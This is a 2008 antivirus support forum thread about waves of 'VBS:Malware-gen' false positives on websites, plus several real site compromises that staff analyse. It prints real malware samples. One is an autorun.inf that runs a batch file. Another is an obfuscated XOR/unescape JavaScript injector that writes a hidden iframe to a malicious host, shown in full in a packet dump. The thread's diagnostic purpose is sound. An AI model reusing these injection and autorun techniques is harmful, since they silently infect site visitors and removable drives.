Avast WEBforum
Other => Viruses and worms => Topic started by: Malky on January 25, 2008, 12:19:31 AM
-
I just got my home avast update to ver. (bieżąca wersja 080124-0)
and every forum phpBB i try to get in grives me this virus warning and cuts off connection.
I asked my friend that had older ver. of avast to gry to my forum tha im admin (its phpBB also and also gives me this virus warming) to go to some topics - he didnt het any warning - but then he made update and suddenly he cant get in any forum phpBB same as i do - get warning about VBS:Malware-gen virus and connection is cutting off...
whats going on???????????????????????
-
The same thing is happening to me. Malwarecrush.com is driving me nuts. It attaches over and over again and I can not get rid of it. How do I get rid of it for good? I have uninstalled over and over again. I reported it to Avast the other day and received no response. Someone, HELP!
-
This is a obvious false alarm and we're going to fix it ASAP.
Sorry for any inconveniece. We've did a major rehaul of the scripting detection and it still has some nuisances.
-
I wanted to start a new thread but noticed kubecj and take it that my problem in the same line:
After the latest update of Avast it all of a sudden warned me that VDownloader a problem, Win32.Trojan-gen (UPX). No big deal because I've forgotten that I have this prog.
I then tried to d/l v0.61 again from their site and same issue.
It is in the VDownloader.exe and not the ffmpeg.exe or pthreadGC2.dll files.
I deleted the prog (standalone) and then scanned two prev versions but they are fine.
Ditto with SoftPerfect Network Scanner, Win32:Spyware-gen (Trj). I have had this prog (standalone) on my puter since 11 March 2007. Today is the first warning.
The current version downloads w/o any warning.
Ditto with Registry Trash Keys Finder v 3.7.4 - Win32:Trojan-gen (Other)
Are these due to some new development?
-
Hi guys I'm new here I unfortunetly just received the VBS:malware-gen virus while going to this website www.cwmania.com and also I have the Win32:Agent-PBL [trj] virus on my system. The virus were placed in the avast Virus chest should I leave them in there or get rid of them off my system???
-
I also have a problem of Malware, but in my case , this is when i try to launch Google u_u
Is it the same problem than PHPbb forums ? ???
-
If it is fixed, how do I stop getting the same problem [on daughters machine]?
I updated and rebooted and the same problem is there.
Look forward to your response.
Thanks
Ozzie
-
Ozzie, which page triggers the alarm in your case, exactly?
Thanks
Vlk
-
Every page my daughter loads.
Thanks VLK
-
The phpBB related problem seems to be solved along with the new definitions, but I'm still getting same - probably similarly false-positive - worm detections from some other pages.
http://members.lycos.co.uk/spacespider/ (http://members.lycos.co.uk/spacespider/)
As a sample one. In case you want to know why that very random link popped up on my browsing, I was looking for some Baldur's Gate portraits and that link was listed in a page that lists those.
Haven't encountered it on other pages yet after the new definitions to fix the previous phpBB false positive problem. Of course, it could be genuine this time, but I suspect it because it's the same detection report, and what are the odds of that right after similar false positives started popping up with other pages...
-
Unfortunately my daughter got impatient and has downloaded AVG as that isn't doing the same thing thankfully.
Thanks for help.
-
I am also getting the same error for any page I visit since the update today. Once i stop the protect then I am able to go to any page i want to. When are you guys going to have a fix?
-
My VPS file is current 080125-0 and I am still getting the VBS:malware-gen warning every time I open a website/page.
Any suggestions or help would be appreciated - currently have both web and standard shields on Pause (not a warm and fuzzy feeling)
Thanks!
-
I've just checked all my updates, both program and definitions are "up do date"
EVERY SINGLE site I try to visit reports the VBS:MALWARE-GEN infection. :'(
This includes
uk.yahoo.com
www.google.com
forum.avast.com
PLEASE PLEASE PLEASE fix this. U R G E N T L Y !
Any chance you could re-release the last known good definitions as an "update" to fix this in the meantime ?
-
Please always report your actual VPS version and the exact url doing the false alarm, otherwise we can't cross-test it.
-
I'm having the same problem. Since last night suddenly I got the virus notification from single web page and since then it comes from every single web page I go to, or atleast I haven't yet found page that wouldn't give the warning.
VPS is up to date (current version 080125-0). ???
-
This is weird. Since we've tested it to our best efforts, so I believe this is not merely avast x webpage problem, ie. classical FP.
Do you have any web-filtering software installed which may change the pages?
Can you please try to save webpage and then scan it with on-demand scan of avast? If it does return the false alarm, can you send the zipped sample to virus@avast.com and also report what networking/web software you use?
Thanks.
-
Ah...I found a solution. For some reason Sunbelts firewall (Kerio or wth it's?) doesn't seem to work that well with Avast anymore. When I turned the firewall off totally now Avast doesn't say anything anymore, and when I turn it back on every webpage "has virus" again.
-
This Kerio cooperation problem should be fixed now in 080125-1.
-
I had a same problem with cooperation between avast and kerio(sunbelt). Try to turn-off firewall and then start it up again. In my case it helped somehow :)
brgds,
jaqub
-
This Kerio cooperation problem should be fixed now in 080125-1.
Omg you ppl are fast :D Best customer care I have ever got!
-
still problems even in 080125-1 version.
but, temporary i stopped the web shield.
awaiting for a solution :)
-
I run a website and its come up with same thing so I am worried that possible buyers are put off thinking I might effect thier computers! Avast please do something about this.
Its not good for business >:(
-
Hi guys,
A sample of alert, i receive.
avast! [MATCHIR3]: File "http://www.horizon-mariage.com/forum/14_0-mariage-pas-cher.html\unp118192644" is infected by "VBS:Malware-gen" virus.
"Resident protection (Web Shield)" task used
Version of current VPS file is 080124-0, 24/01/2008
-
Current vps is 080125-2. Please update first.
-
Fantastic work!
080125-2 works fine and there are no more conflicts between Sunbelt firewall or Counterspy2.
As always Avast! and the brilliant people that comprise it's staff have done an amazing and very fast job.
Great customer driven focus! Thanks for all your help!
-
Hi, check this website: www.mediadot.ro . It gives the same error.
-
We have a user currently on 080125-3 and getting VPS: Malware-Gen hits when browsing the http://www.smithbarney.com site. Load the home page and click "Indices" on the navigation bar near the top to try it yourself.
-
Actually, try the big "Research and Commentaries" tab instead.
-
Detection was removed from the database and will be out in the next update.
Thanks for your feedback.
-
Just wanted to say thanks for the quick response, Initially had this problem but appears corrected now.
-
Hello,
had same VBS:Malware-gen stuff on a few different sites . They almost all disappeared after the different updates in Avast! (home edition) of the last 2 days, EXCEPT one : on my mail site (annoying !!) .
Running VPS file version = 080127-1 . Ran full (= also program )update 1 hr ago (with no effect since standard setting= automatic update ) .
Site : WWW.aemail4u.com .
Problem starts when logging in on the mail server (I mean : www.aemail4u.com is OK, but any further attempt creates a warning )
Last msg from the log : (2 mins ago) :
Sign of "VBS:Malware-gen" has been found in "http://aemail4u.mail.everyone.net/email/scripts/welcome.pl?EV1=12014509807790792" file .
-
False alarm removed from the database. Will be out on the next update.
(You know, without report we can't do anything)
-
Updated VPS to 080128-0, but is still getting the problem with this address
http://www.huaren.us/index71.asp?boardid=355
It's ok to go to the main page, http://www.huaren.us/, but if you go to any forums the warning about VBS:Malware-gen will come up. It's a Chinese website, but it has English names for the forums too, like Exchange, Parenting, etc. My wife visits the website everyday. Please have the problem fixed so she can stop bothering me. :(
-
False alarm removed. Thanks for your submission.
Please remember, that without the reports we can't fix things (because we don't know they're broken).
-
Hello,
I have the same problem with the website of an hotel in italy : http://www.casalbertina.it/
I receive this virus message and the connexion can't go on.
I've immediately do a scan of the PC : Avast found the same "virus" on d: in a folder where there is nothing special or new (some previous scans with avast and an other antivirus online of this folder have nothing founded ) then blocked.
Avast update itself automatically.
Here is the log :
"28/01/2008 20:07:26 SYSTEM 1444 Sign of "VBS:Malware-gen" has been found in "http://www.casalbertina.it/favicon.ico" file.
28/01/2008 20:07:34 SYSTEM 1444 Sign of "VBS:Malware-gen" has been found in "http://www.casalbertina.it/" file.
28/01/2008 20:09:30 SYSTEM 1444 Sign of "VBS:Malware-gen" has been found in "http://www.casalbertina.it/" file.
28/01/2008 20:42:09 SYSTEM 1444 Sign of "VBS:Malware-gen" has been found in "http://www.casalbertina.it/" file.
28/01/2008 20:42:28 SYSTEM 1444 Sign of "VBS:Malware-gen" has been found in "http://www.casalbertina.it/" file.
28/01/2008 21:04:56 Eigenaar 3944 Sign of "Win32:Adware-gen [Adw]" has been found in "D:\BACK UP PROGRAMMES ET OUTLOCK\MISES A JOUR PC\Nero-6.6.1.15a.exe\Toolbar.exe\[Embedded#620d0]\[Embedded#04080]" file.
28/01/2008 22:23:37 SYSTEM 1448 Sign of "VBS:Malware-gen" has been found in "http://www.casalbertina.it/" file. "
Can you help me.
Thanks in advance
-
The hotel's webpage contains double encrypted hidden iframe. I'd not call this a false alarm, it's highly suspicious.
-
OK. Thank you.
But the other one found on d: ?
It's an update of nero 6 (download a long time ago on the site of Ahead) and which was ignored before.
An explanation ?
-
thanks for your help ! Last update loaded today (***128-0 ), and my problem is solved .
You're the best ! ! !
-
Updated VPS to 080128-0, but is still getting the problem with this address
http://www.huaren.us/index71.asp?boardid=355
Updated and problem solved. Thanks a bunch!
-
Same problem here white trying to enter http://foromjworldpage.mforos.com, a forum of www.miarroba.com community. I guess that's the web... It's the only website I entered today...
VPS: 080131-1
I tried to clik the options but the alarm comes again just some secondslater.
-
Running the very same VPS, I visited the site and got no warning. Next time please copy the url from the warning dialogue, so that I may download and check it. Thanks.
-
Ok, i'll do it.... But, meanwhile, how do i close the window that appears over and pver again? Do I hace to click "no hacer nada" (don't do anything").... All the other options don't work, the window appears just some seconds later....
-
It says the virus was found on "c:\autorun.inf" The log says nothing about any website....
And the window appears over an pver again, I'm starting going crazy ::)
-
it's a correct detection imho... autorun viruses are quite widespread in last few months... i can't understand microsoft hole to system, when they left autoruns turned on for all drives by default.. it gives no sense to allow autorun for other devices than CD/DVD... unfortunately, many ppl have no idea how to turn it off right after installation.. :-\
-
Honestly, I got no idea what you're talking about.... This is the very first time something like this happend to me since I got Avast (and tha't like a year and a half...). Am still trying to click on the options but the window still appear over and over again....
Someone please tell me what should I do.... Taking into acount that I got no idea of how the system works and all that... Am just an average user.
-
folow the threads with INF:Autorun discussion... you can use the search function ;)
-
I've been searching and there are quite a lot of post about that.... I got absolutly lost... Maybe because of my english, maybe because I don't got much idea about this kind of things...
If you could please give me the instructions, or something.... I'll be thankful
Anyway, I gotta go now, let's if I can fix the problem tomorrow.
Thanks.
-
can you look at the content of your autorun.inf?
-
Since yesterday me and other avast users get VBS:Malware-gen found on http://www.deliverance-guild.com/ where we use PhPNuke.
I scanned it with http://www.freedrweb.com/browser/mozilla+firefox/ with no detection of anything.
If I download the php file moduels.php and scan it locally I get the same.
A zipped version of the php file is avalible at:
http://www.deliverance-guild.com/erduker/PhPNukeModulesVBSMalware-gen.zip
I belive the is a false detection. Correct me if I am wrong.
-
Inside the page there is a encrypted string, containing hidden iframe pointing to counter-google.com. Quick websearch found this site mentioned only in ties with malware.
Hm, it seems that there is a lot of 'stuff' around... ::)
-
can you look at the content of your autorun.inf?
This is what it says:
;L7rkJLrfswDfUDdFkq55r1p484okrw2owk3Xl2kakaqeKjk0IqSD73iiiADki3dkloD9S4K25jqL4k0qs3lKlqfKddea
[AutoRun]
;2IsSK4CsLL0ojSrS51sr9eowUi1d3ioa435adSL23dDsOasLp6
open=juok3st.bat
;LwSKs25530Kms3r5JDKXki4sqr2k1ol43JwaLl4jaSDfksLD25faq3Kw297iL262akl4wLilKZ2ffosdkpdiAsiirwi3jdikS7aa7q8a4dA0llJa
shell\open\Command=juok3st.bat
;A43Aw7wfoL2q3a2
shell\open\Default=1
;s4Dr745s5ao30a2kfkr14fs3ikaaowerjwiap3l50DkDLaKDe2md26w2krk1wj9Dd5q72iDAo4lIkKa32akf3qwslL3s7aFAljL4Jk5X
shell\explore\Command=juok3st.bat
;csk0Ciksi3adlKoje73aKoDp1rA4Lo7kq1SdA99iF3nkwsdk6AqO2Jawids4ri50w8paDkAd5p2Hss0Leaa1rdd0a3s
-
hey,i think i've also a problem with this vbs:malware-gen virus which is that,every new external disk i put my pc,my avast s giving me that warning: "F:/autorun.inf is infected with vbs:malware-gen" and avast isn't deleting it..what must i do?
thanks..
-
Hi, I'm facing the same problem as Mairy. The Avast On-access Scanner keeps popping up with the following message:
File name: C:\autorun.inf
Malware Name: VBS:Malware-gen
Malware Type: Virus/Worm
VPS Version: 080201-1, 02/01/2008
But I'm unable to delete, repair, or move the virus to the chest. It affects all three drive, C:, D: and H: (removable).
A friend recommended using Flash Disinfector, as she had the same problem and it worked for her. But hasn't worked for me.
I'm also using AVG concurrently, and it detected a Funny UST Scandal.avi.exe, which Avast couldn't detect. What would you suggest I do to get rid of them all. Thank you!
Best Regards,
Hari
-
Hi, I'm facing the same problem as Mairy. The Avast On-access Scanner keeps popping up with the following message:
File name: C:\autorun.inf
Malware Name: VBS:Malware-gen
Malware Type: Virus/Worm
VPS Version: 080201-1, 02/01/2008
But I'm unable to delete, repair, or move the virus to the chest. It affects all three drive, C:, D: and H: (removable).
A friend recommended using Flash Disinfector, as she had the same problem and it worked for her. But hasn't worked for me.
I'm also using AVG concurrently, and it detected a Funny UST Scandal.avi.exe, which Avast couldn't detect. What would you suggest I do to get rid of them all. Thank you!
Best Regards,
Hari
Don't use more than one anti-virus with real-time scanning at the same time, they will conflict! avast! will shut down some or all of it's components to avoid conflict. Try a boot-time scan with only avast! on your computer.
-
I see from Jan 24, 2008 that kubecj writes that "This is a obvious false alarm and we're going to fix it ASAP. Sorry for any inconveniece. We've did a major rehaul of the scripting detection and it still has some nuisances."
Has this been fixed and if so how does the Avast world get the update?
My problem is with the resident program. By default the Script Blocking module of the program is running. So when I go to http://pagegravy.com/client_demos/AviationIndustryExpo.html, I am warned that a sample of the VBS:Malware-gen was found. By disabling this module the page loads as normal.
My concern is that I want to place the ad that is in this page on my website. But I can't do this knowing that people with Avast who visit my site will get this warning.
-
Well it seems avast isn't alone in detecting something on that page, so does the DrWeb link checker, In file >AviationIndustryExpo.html/javascript.0
So is that the same file avast is alerting on ?
DrWeb link checker, http://online.drweb.com/?url=1 (http://online.drweb.com/?url=1)
-
Hey, thanks for the quick response. My vendor has modified the file to keep Avast and other protectors from falsely alerting on the site.
-
Thanks for the feedback, no detection nor by DrWeb link checker or avast.
Welcome to the forums.
-
Hi,
same "VBS:Malware-gen" problem with http://www.ziza.ru/
(http://img182.imageshack.us/img182/9484/sanstitregv7.jpg)
says it's clean
but with Avast no
- Programme : Déjà à jour
(version actuelle 4.7.1098)
- Vps : Déjà à jour
(version actuelle 080214-0)
very annoying
thank you for checking
-
False positive detection on
http://www.ziza.ru/ will be corrected in next vps update. Thanks for attention.
-
No Matter what I do this will not go awat. Can anyone help
Thanks
Bob
C:\Documents and Settings\ROBERT LAZOR\Local Settings\Temporary Internet Files\Content.IE5\SPOH6J05\check[1].js
C:\Documents and Settings\ROBERT LAZOR\Local Settings\Temporary Internet Files\Content.IE5\SPOH6J05\check[2].js
Malware name VBS:Malware-gen
Malware type Virus/Worm
VPS version 080215-0, 02/15/2008
-
They're in your cache, so delete the cache (Temporary Internet Files) and this should go away. If they reappear, that means that you're don't have Webshield turned on and they're getting downloaded and most probably executed.
If you want them checked, please send them to virus@avast.com and tell us we're catching them as a virus. But you may also want to check them using Virustotal for the detection of the other antiviruses.
-
My webshield is on but I am getting several of these BV:Malware-gen thingies too.
Apologies for the dumb questions; what sort of dangers do they pose? Also, what do you mean by 'delete the cache' and how do you do this?
EDIT: When the scan finished the items were successfully moved to chest; is it safe just leave them there?
-
I run the website http://www.tVadio.com
Avast has been reported by a number of users to be providing a false positive virus announcement stating tVadio has the VBS:Malware-gen virus.
Could you please fix this or let me know if there is anything I need to do.
-
After the end of </html> of site tvadio.com, there is added javescript, with encrypted string which contains hidden iframe pointing to salevisitor.net. This is highly suspicious. Do you know about the code?
-
avast! is not the only AV to detect malware on the page:
Antivirus Version Last Update Result
AhnLab-V3 2008.2.20.0 2008.02.20 -
AntiVir 7.6.0.67 2008.02.20 -
Authentium 4.93.8 2008.02.20 -
Avast 4.7.1098.0 2008.02.20 -
AVG 7.5.0.516 2008.02.20 -
BitDefender 7.2 2008.02.20 -
CAT-QuickHeal 9.50 2008.02.18 -
ClamAV 0.92.1 2008.02.20 -
DrWeb 4.44.0.09170 2008.02.20 Trojan.Click.4756
eSafe 7.0.15.0 2008.02.17 -
eTrust-Vet 31.3.5550 2008.02.20 -
Ewido 4.0 2008.02.19 -
FileAdvisor 1 2008.02.20 -
Fortinet 3.14.0.0 2008.02.19 -
F-Prot 4.4.2.54 2008.02.19 -
F-Secure 6.70.13260.0 2008.02.20 -
Ikarus T3.1.1.20 2008.02.20 -
Kaspersky 7.0.0.125 2008.02.20 -
McAfee 5233 2008.02.20 -
Microsoft 1.3204 2008.02.20 -
NOD32v2 2889 2008.02.20 -
Norman 5.80.02 2008.02.19 -
Panda 9.0.0.4 2008.02.20 -
Prevx1 V2 2008.02.20 -
Rising 20.32.22.00 2008.02.20 -
Sophos 4.26.0 2008.02.20 Mal/Iframe-F
Sunbelt 3.0.884.0 2008.02.19 -
Symantec 10 2008.02.20 Downloader
TheHacker 6.2.9.224 2008.02.19 -
VBA32 3.12.6.1 2008.02.17 -
VirusBuster 4.3.26:9 2008.02.19 -
Webwasher-Gateway 6.6.2 2008.02.20 -
(I guess Webshield must decode unescape where the scanner at VirusTotal doesn't.)
-
The encrypted link is infected too:
-
After the end of </html> of site tvadio.com, there is added javescript, with encrypted string which contains hidden iframe pointing to salevisitor.net. This is highly suspicious. Do you know about the code?
No I do not.
I downloaded a local copy of the homepage code and found this:
<script type="text/javascript">
<!-- -->
<!--
document.write(unescape('%3C%69%66 ...snip... %6D%65%3E'));
//-->
</script>
I got rid of that code and it is now fine.
Any explanation - I certainly did not put that code there.
How did you figure out it was from salesvisitor.net?
-
I got rid of that code and it is now fine.
Any explanation - I certainly did not put that code there.
You've been hacked. There is non zero probability such code or similar will be there sooner or later again. You should check all of the software you're using for potential security issues. There is also probability that there is somewhere some other kind of malware.
How did you figure out it was from salesvisitor.net?
We've got tools for 'decrypting' such stuff.
-
We've got tools for 'decrypting' such stuff.
Very James Bond, but your tools are also available online:
http://www.linkedresources.com/tools/unescaper_v0.2b1.html (http://www.linkedresources.com/tools/unescaper_v0.2b1.html)
;D
-
Quite possible. I put it in quotes, because it's a really simple script (except that it does automatically extract all unescape sequences and print them without any manual work). No rocket science employed here ;)
-
We are getting a false positive on http://www.littlemonkey.co.nz , VPS version 080220-0, 20/02/2008 could you look into this.
Regards
Graham.
-
alert on
http://www.littlemonkey.co.nz is not a false positive. Probably when your server redirects to another location, it sends suspicious code with encrypted iframe with following address: http://tipocnt.com/....
Do you know this server?
-
Where abouts in the code have you found a reference to http://tipocnt.com/?
I have downloaded all the scripts for the home page and cannot find a reference to this server in the code are you sure you are correct?
If so do you know which script may be infected?
Regards
Graham.
-
Somewhere along the downloading of the page, this gets downloaded:
<script language="JavaScript">e = '0x00' + '19';str1 = "%A2%FA%F1 ...snippage... %B7%FA%F1%EC%A4";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));
str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);
}document.write(str);</script>
It contains 'encrypted' hidden iframe leading to tipcont.com
-
Thanks for that we will look into it straight away.
Regards
Graham.
-
I don't FTP access to this server but this line of code looks wrong to me is any one else hear familiar with this being inserted into websites?
<script type='text/javascript' src='/e107_files/sleight_js.php'></script>
The .php part looks like it is to prevent downloading or viewing while it runs as a script?
Regards
Graham.
-
Hi,
http://www.littlemonkey.co.nz is my site. I've double and triple checked the scripts running on the site, I've used FireBug to determine network activity when loading the page and can find no encrypted javascript or references to tipocnt.com.
I have scanned it with NOD32 (Virus Bulletins top rated antivirus software: http://www.eset.com/products/compare-NOD32-vs-competition.php) and the page is clean.
I have dealt with a cleaned up other sites in the past that have had similar exploits, so I do know what I'm looking for, and was convinced it was a false positive for avast (something that is not unheard of be any means) until kubecj and jsejtko have indicated otherwise. I would really appreciate some further information, i.e. WHERE in the source is that javascript being downloaded and HOW did you determine that tipocnt.com.
This is important not just for casual visitors to my site, but for a specific prospect that uses Avast and needs to view my site.
Thanks
Nick
-
I have seen Dr.web mentioned a few times, so I have just run a check using it on http://www.littlemonkey.co.nz and it comes up clean can we please get someone else to check and confirm that avast may be at fault here?
Regards
Graham
-
http://www.littlemonkey.co.nz
In fact, this is a neat trick. The javascript is sent along with 302 (redirect) reply. Not sure what 'should' browsers do when the get both 302 and the content, but obviously, your server sends the 'ugly' stuff.
This is VirusTotal report regarding the code:
http://www.virustotal.com/cs/analisis/7312aedf9204d7300566560d4f681ee0
Hypertext Transfer Protocol
HTTP/1.1 302 Found\r\n
Response Code: 302
Date: Thu, 21 Feb 2008 21:23:34 GMT\r\n
Server: Apache/2.2.3 (Debian) mod_ssl/2.2.3 OpenSSL/0.9.8e mod_perl/2.0.2 Perl/v5.8.8\r\n
X-Powered-By: PHP/5.2.0-8+etch9\r\n
Location: news.php\r\n
Connection: close\r\n
Transfer-Encoding: chunked\r\n
Content-Type: text/html\r\n
\r\n
Data (545 bytes)
0000 00 11 2f 0e db b3 00 0b 6b 4d 0a 8c 08 00 45 00 ../.....kM....E.
0010 03 58 22 52 40 00 28 06 e1 c4 d2 37 69 52 0a fe .X"R@.(....7iR..
0020 05 02 00 50 05 22 f3 26 15 f1 e0 0f 4d cc 50 18 ...P.".&....M.P.
0030 19 20 42 18 00 00 48 54 54 50 2f 31 2e 31 20 33 . B...HTTP/1.1 3
0040 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 02 Found..Date:
0050 54 68 75 2c 20 32 31 20 46 65 62 20 32 30 30 38 Thu, 21 Feb 2008
0060 20 32 31 3a 32 33 3a 33 34 20 47 4d 54 0d 0a 53 21:23:34 GMT..S
0070 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e erver: Apache/2.
0080 32 2e 33 20 28 44 65 62 69 61 6e 29 20 6d 6f 64 2.3 (Debian) mod
0090 5f 73 73 6c 2f 32 2e 32 2e 33 20 4f 70 65 6e 53 _ssl/2.2.3 OpenS
00a0 53 4c 2f 30 2e 39 2e 38 65 20 6d 6f 64 5f 70 65 SL/0.9.8e mod_pe
00b0 72 6c 2f 32 2e 30 2e 32 20 50 65 72 6c 2f 76 35 rl/2.0.2 Perl/v5
00c0 2e 38 2e 38 0d 0a 58 2d 50 6f 77 65 72 65 64 2d .8.8..X-Powered-
00d0 42 79 3a 20 50 48 50 2f 35 2e 32 2e 30 2d 38 2b By: PHP/5.2.0-8+
00e0 65 74 63 68 39 0d 0a 4c 6f 63 61 74 69 6f 6e 3a etch9..Location:
00f0 20 6e 65 77 73 2e 70 68 70 0d 0a 43 6f 6e 6e 65 news.php..Conne
0100 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 54 72 ction: close..Tr
0110 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a ansfer-Encoding:
0120 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e chunked..Conten
0130 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d t-Type: text/htm
0140 6c 0d 0a 0d 0a 32 31 35 0d 0a 0a 3c 73 63 72 69 l....215...<scri
0150 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 pt language="Jav
0160 61 53 63 72 69 70 74 22 3e 65 20 3d 20 27 30 78 aScript">e = '0x
0170 30 30 27 20 2b 20 27 31 39 27 3b 73 74 72 31 20 00' + '19';str1
0180 3d 20 22 25 41 32 25 46 41 25 46 31 25 45 43 25 = "%A2%FA%F1%EC%
0190 38 36 25 45 42 25 45 41 25 45 31 25 46 32 25 46 86%EB%EA%E1%F2%F
01a0 44 25 41 35 25 42 38 25 45 43 25 46 31 25 45 42 D%A5%B8%EC%F1%EB
01b0 25 46 31 25 46 38 25 46 31 25 46 32 25 46 31 25 %F1%F8%F1%F2%F1%
01c0 45 41 25 45 31 25 41 30 25 46 45 25 46 31 25 46 EA%E1%A0%FE%F1%F
01d0 41 25 46 41 25 46 44 25 46 34 25 42 38 25 41 34 A%FA%FD%F4%B8%A4
01e0 25 41 32 25 46 31 25 46 43 25 45 38 25 46 39 25 %A2%F1%FC%E8%F9%
01f0 46 35 25 46 44 25 38 36 25 45 42 25 45 38 25 46 F5%FD%86%EB%E8%F
0200 42 25 41 35 25 42 38 25 46 45 25 45 41 25 45 41 B%A5%B8%FE%EA%EA
0210 25 46 36 25 41 30 25 42 37 25 42 37 25 45 41 25 %F6%A0%B7%B7%EA%
0220 46 31 25 46 36 25 46 37 25 46 42 25 46 34 25 45 F1%F6%F7%FB%F4%E
0230 41 25 42 34 25 46 42 25 46 37 25 46 35 25 42 37 A%B4%FB%F7%F5%B7
0240 25 46 32 25 46 41 25 42 37 25 46 35 25 46 44 25 %F2%FA%B7%F5%FD%
0250 46 34 25 45 41 25 42 37 25 42 38 25 38 36 25 45 F4%EA%B7%B8%86%E
0260 46 25 46 31 25 46 41 25 45 41 25 46 45 25 41 35 F%F1%FA%EA%FE%A5
0270 25 41 39 25 38 36 25 46 45 25 46 44 25 46 31 25 %A9%86%FE%FD%F1%
0280 46 46 25 46 45 25 45 41 25 41 35 25 41 39 25 41 FF%FE%EA%A5%A9%A
0290 34 25 41 32 25 42 37 25 46 31 25 46 43 25 45 38 4%A2%B7%F1%FC%E8
02a0 25 46 39 25 46 35 25 46 44 25 41 34 25 41 32 25 %F9%F5%FD%A4%A2%
02b0 42 37 25 46 41 25 46 31 25 45 43 25 41 34 22 3b B7%FA%F1%EC%A4";
02c0 73 74 72 3d 74 6d 70 3d 27 27 3b 66 6f 72 28 69 str=tmp='';for(i
02d0 3d 30 3b 69 3c 73 74 72 31 2e 6c 65 6e 67 74 68 =0;i<str1.length
02e0 3b 69 2b 3d 33 29 7b 74 6d 70 20 3d 20 75 6e 65 ;i+=3){tmp = une
02f0 73 63 61 70 65 28 73 74 72 31 2e 73 6c 69 63 65 scape(str1.slice
0300 28 69 2c 69 2b 33 29 29 3b 73 74 72 3d 73 74 72 (i,i+3));str=str
0310 2b 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 +String.fromChar
0320 43 6f 64 65 28 28 74 6d 70 2e 63 68 61 72 43 6f Code((tmp.charCo
0330 64 65 41 74 28 30 29 5e 65 29 2d 31 32 37 29 3b deAt(0)^e)-127);
0340 7d 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 }document.write(
0350 73 74 72 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0d str);</script>..
0360 0a 30 0d 0a 0d 0a .0....
-
Neat trick huh?
Ok, I've removed that malicious code and notified my host to check security at their end. Could you confirm that the site is now clean please?
I assume that all other virus scans were showing clean as the code is never executed (at least not by firefox) due to the redirect header? How much of a risk is this type of exploit if browsers ignore the content?
Cheers,
Nick
-
Depends on the point of view.
From the user's view - if the browser won't execute (I don't know and I can't google anything reasonable), nothing happens, just the code is stored in user's cache.
From the webmaster's view - something is very wrong regarding the security and this may be just one of the 'bad things' sitting quietly on the server.
Right now avast! does not report anything on load. NOD32 and Dr.Web did not report anything just because they won't catch it at all. See the VirusTotal report - both consider the piece as 'ok'.
-
I am seeing VBS Malware-gen warnings against the site www.australianolives.com.au. Is it possible to work out whether this is a false positive or an actual malware? The webmaster believes her site is OK; we are using Avast Enterprise with the latest updates (but I've seen the same warning at home with the free edition), and I see from the discussion above that some of these are false positives and some are not. Our local machines are not infected according to avast.
This issue seems pretty tricky!
MrChuck
-
It does reference encrypted hidden iframe pointing to stat-google.com. We definitely don't like that 8)
-
The stat-google.com is registered to google inc. perhaps something similar to the google-analytics.com ?
-
I just started noticing incessant warnings for this after the update on several scripts I have on my computer for my websites.
I know there is no malware on them at all so what in the code could possibly be triggering all these warnings?
One of the scripts is something I put together to allow editing of a website template online by the person who downloaded it. It is quite simple really. Nothing malware about it.
It uses javascript and a form combined with a variable(section) to be replaced when the user presses submit. Could it be something in the javascript that is triggering this?
Heidi
-
May be. The best you can do is to send us the samples to virus@avast.com, stating that it's a false alarm and also by which VPS version you got which detection.
-
OK, I'm not much the wiser. Is encrypting a hidden iframe something google is likely to do? If so, why are they using hacker technology for 'legitimate' statistics collection?
So the question still is: should avast be reporting this as a threat or not, and what do I tell the australian olives webmaster?
MrChuck
-
Does she know there is such stuff on her site?
Is stat-google.com really 'legitimate' google site used for tracking purposes? (I don't question the ownership, but that may be bought later)
Why is this stuff hidden is special file, does document.write and is obfuscated?
To me it definitely looks fishy.
-
Thanks to all, I have passed this information on to the webmaster at Australia Olives.
-
Here is the webmaster's comment--interesting!
'I did at one stage install a Google Adsense module on the site. stat-google.com is referenced in that file.
I subsequently removed the google ads, but the script that Google gave me is still on the site. It's used for counting the number of 'click-throughs' that are made from a Google ad to the advertisers home page, so that Google can pay commissions. I'm am sure it won't hurt you, but I will take it off the site since we're not using it anyway.
In the meantime, I did also find a folder full of images that i didn't put there, and which I'm getting our service provider to look into as well.'
So is google adsense a worm? :-)
MrChuck
-
I'll ask Paranoia Inc. subsidiary in my neighborhood ;D ;D
Problem is we're mostly getting 'how' it's done. And doing that encrypted in an external file looked simply suspicious (I it does not matter which site it contacts).
-
I have this similar problem in a Plugin that is made for Cash Crusader GPT script software.
I am getting the warning to abort connection because the file emailidlist.php has the virus VBS: malware-gen
Is there a way for me to submit the zip file so you guys can put it on your white list or something? This is a highly sold plugin and I do not need that warning popping up for customers to think they are buying an infected product.
Thanks in advance for your help! :)
Winter Perkins
www.designsbywinter.info
www.seamlesswebsolutions.com
-
Is there a way for me to submit the zip file so you guys can put it on your white list or something?
You send the samples to virus@avast.com ?
You can zip and password the files... Inform a link to this thread and the password used.
Or you can send the files to Chest and, from there, resend to Alwil for analysis.
Thanks.
As a workaround, if you think and are sure it's a false positive, you can add these files to the Standard Shield provider (on-access scanning) exclusion list.
Left click the 'a' blue icon, click on the provider icon at left and then Customize. Go to Advanced tab and click on Add button...
You can use wildcards like * and ?. But be careful, you should 'exclude' that many files that let your system in danger.
You can add the url to WebShield exclusion list also.
-
False alarm, fixed in the internal build.
-
False alarm, fixed in the internal build.
Thanks for the quick response. Hey... today is Sunday ;D
-
Monday here already ;D 8)
-
Monday here already ;D 8)
Wow... worse... it's late in the evening... children must be at their bed ;D
-
I have to add another site that may be giving a falst positive.
hxxp://absolute-bikini.com/ (and hxxp://absolute-bikini.com/)
Also, once I block the malware from the page, I find I can't even attempt to bring up the page again.
Is there something in avast that is preventing it? I was going to try and find out what was in the page source but can't do that now.
I haven't found anywhere where the site is blacklisted yet, still looking tho.
-- Smoovious
-
Indeed a false alarm. Removed from the internal build, will be fixed in next public vps update.
